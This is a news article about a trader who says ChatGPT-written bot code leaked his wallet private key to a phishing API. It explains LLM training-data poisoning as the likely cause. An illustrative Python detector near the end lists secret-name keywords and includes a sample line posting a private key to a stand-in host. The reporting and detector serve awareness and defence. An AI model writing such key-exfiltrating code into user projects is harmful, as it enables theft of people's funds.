Author: Azuma, Odaily Planet Daily



On the morning of November 22 (Beijing time), Yue Wen, founder of SlowMist, shared an unusual case on his personal X account: a user's wallet had been "hacked" by AI...

The background of this case is as follows.

In the early hours of today, X user r_ocky.eth revealed that he had recently tried to use ChatGPT to build a bot to assist his trading on pump.fun.

r_ocky.eth gave ChatGPT his requirements, and ChatGPT returned a piece of code. The code could indeed deploy a bot that met his requirements, but he never expected it to contain hidden phishing content. r_ocky.eth connected his main wallet and lost $2,500 as a result.



According to the screenshot posted by r_ocky.eth, the code provided by ChatGPT sends the wallet's private key to a phishing API site, which was the direct cause of the theft.



After r_ocky.eth fell into the trap, the attacker moved extremely quickly, transferring all the assets in his wallet to another address (FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX) within half an hour. r_ocky.eth then traced the funds on-chain and found an address (2jwP4cuugAAYiGMjVuqvwaRS2Axe6H6GvXv3PxMPQNeC) suspected to be the attacker's main wallet.

On-chain data shows that this address has so far accumulated more than $100,000 in stolen funds, leading r_ocky.eth to suspect that this type of attack is not an isolated case but part of a larger-scale campaign.

Afterwards, r_ocky.eth expressed his disappointment, saying he had lost trust in OpenAI (the developer of ChatGPT), and called on OpenAI to promptly remove the phishing content.

So why would ChatGPT, today's most popular AI application, serve up phishing content?

Yue Wen characterized the root cause of the incident as an "AI poisoning attack" and pointed out that deceptive behavior is widespread in ChatGPT, Claude and other LLMs.

An "AI poisoning attack" is the deliberate corruption of AI training data or manipulation of AI algorithms. The attackers may be insiders, such as disgruntled current or former employees, or external hackers. Their motives may include causing reputational and brand damage, undermining the credibility of AI decisions, and slowing down or disrupting AI progress. By injecting data with misleading labels or features, attackers can distort the model's learning process, causing it to produce erroneous results once it is deployed.

In this incident, the most likely reason ChatGPT gave phishing code to r_ocky.eth is that the model was trained on data contaminated with phishing content. The AI apparently failed to recognize the phishing content hidden among otherwise normal data and passed it on to the user.

As AI advances and becomes more widely adopted, the threat of "poisoning attacks" is growing more serious. Although the absolute loss in this incident is small, the wider implications of such risks are enough to sound the alarm: what if something similar happened in other areas, such as AI-assisted driving?

Replying to a user's question, Yue Wen mentioned one potential measure to mitigate such risks: adding some kind of code review mechanism to ChatGPT.
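The suggestion does not specify how such a review would work. As a purely illustrative sketch, and not a design from OpenAI or SlowMist, the snippet below assumes the generated code is Python. It uses the standard `ast` module to flag HTTP calls whose arguments reference names that look like wallet secrets, which is the pattern behind this theft. The function name `flag_key_exfiltration`, the keyword list and the set of network calls are hypothetical choices, and a simple pattern match like this is easy to evade, for example by renaming variables or encoding the key.

```python
import ast

# Hypothetical identifier fragments that suggest a wallet secret.
SECRET_HINTS = ("private_key", "privatekey", "secret_key", "mnemonic", "seed_phrase", "keypair")

# Hypothetical set of fully qualified calls treated as "sends data over the network".
NETWORK_CALLS = {
    "requests.get", "requests.post", "requests.put",
    "httpx.get", "httpx.post", "urllib.request.urlopen",
}


def _dotted_name(func: ast.expr) -> str:
    """Rebuild a dotted call name such as 'requests.post'; return '' if it is not a plain chain."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""


def _mentions_secret(node: ast.AST) -> bool:
    """True if any name, attribute or string literal inside `node` looks like a secret."""
    for sub in ast.walk(node):
        text = None
        if isinstance(sub, ast.Name):
            text = sub.id
        elif isinstance(sub, ast.Attribute):
            text = sub.attr
        elif isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            text = sub.value
        if text and any(hint in text.lower() for hint in SECRET_HINTS):
            return True
    return False


def flag_key_exfiltration(source: str) -> list[int]:
    """Return the line numbers of network calls whose arguments reference secret-like data."""
    flagged = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _dotted_name(node.func) in NETWORK_CALLS:
            args = list(node.args) + [kw.value for kw in node.keywords]
            if any(_mentions_secret(arg) for arg in args):
                flagged.append(node.lineno)
    return sorted(flagged)


if __name__ == "__main__":
    sample = """import os
import requests
pk = os.environ.get("PRIVATE_KEY")
requests.get("https://api.mainnet-beta.solana.com")
requests.post("https://example.invalid/collect", json={"private_key": pk})
"""
    print(flag_key_exfiltration(sample))  # → [5]
```

Only the `requests.post` call on line 5 is flagged: reading the key from the environment is not a network call, and the `requests.get` call carries no secret. A real review mechanism would need far more than this, such as data-flow tracking and checks on the destination domain.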

The victim, r_ocky.eth, also said he had contacted OpenAI about the incident. Although he has not yet received a response, he hopes this case will prompt OpenAI to pay attention to such risks and propose potential solutions.